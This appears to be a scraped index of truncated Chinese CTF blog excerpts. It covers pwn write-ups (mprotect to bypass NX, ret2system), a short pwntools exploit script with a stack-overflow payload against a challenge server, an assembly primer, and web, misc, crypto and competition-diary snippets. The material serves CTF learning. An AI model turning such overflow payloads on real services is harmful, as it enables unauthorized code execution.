pwn50 [*] 'C:\\Users\\26597\\Desktop\\pwn50'    Arch:       amd64-64-little    RELRO:      Partial RELRO    Sta…

32位 NX开启 提示mprotect mprotect()函数可以修改调用进程内存页的保护属性 所以利用mprotect函数，就可以绕过NX 从而达到写入shellcode的目的 int ctfshow(){  _BYTE v1[14]; // [esp+6h] [ebp-12h] BYREF​  re…

签到题2 exp: from pwn import *u=remote("node1.anna.nssctf.cn",28532)call_system=0x08048641bin_sh=0x0804863Apayload=b'a'*(0x64+4)+p32(call_system)+p32(0x0)+p32(bin_sh)u.sendline(p…

PWN——CTFshow pwn39 一个32位程序 Arch:       i386-32-littleRELRO:     Partial RELROStack:     No canary foundNX:         NX en…

一、汇编语言简介 汇编语言是计算机硬件与高级语言之间的桥梁，它直接操作计算机的硬件资源。在CTF的Pwn方向中，汇编语言是理解程序底层运行机制和漏洞利用的关键工具。以下内容主要基于x86和x86_64架构展开。 二、基础汇编指令 1. 数据传输指令 mov：用于数据的移动。例如：mov eax, 1          ; 将立即数1赋值给寄存器ea…

ATTACK续 alert 进入题目环境，得到的是一个空白页面，只有一个提示框在反复出现 法1 用view-source协议，查看源码 翻阅发现底下有行小字 flag{3d527&…

九九归一 打开附件 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 44 77 41 41 41 41 38 41 51 41 41 41 41 41 53 68 2b 54 66 41 41 41 41 55 45 6c 45 51 56 52 …

Easy 根据给出的加密算法和密文 编写一个解密程序 def rc4(key, data):    key_length = len(key)    s = list(range(256))    j = 0    for i in range(256):  …

坐上火车的瞬间还是有点奇怪的感觉，这才多久就让我狗运进了半决赛，全靠同队的bk老师和ranfey老师以及凉熙老师，不然我这个选拔赛都差点直接爆0的菜，怎么可能能跑来半决赛和上交和国防科大的碰瓷（虽然比赛的时候，上交和国防科大就在我们邻座，被狠狠薄纱） 一路上也是蛮愉快的，bk老师和然飞老师一直琢磨着出社工题（没来过贵阳的有难了，能不能把这题放国赛选…

Easy_Data Flag得分： 28.47 得分次序： 140 公司的DLP软件报警了，并上传了一段流量。你能帮bob分析下为什么会产生报警么？ misc_easy_data下载 5G网络隐私保护 213.33PT 新技术应用 Flag得分： 380 得分次序： 67 Get_supi 在某些场景下，LTE网络中用户的IMSI会在空口暴露，5G…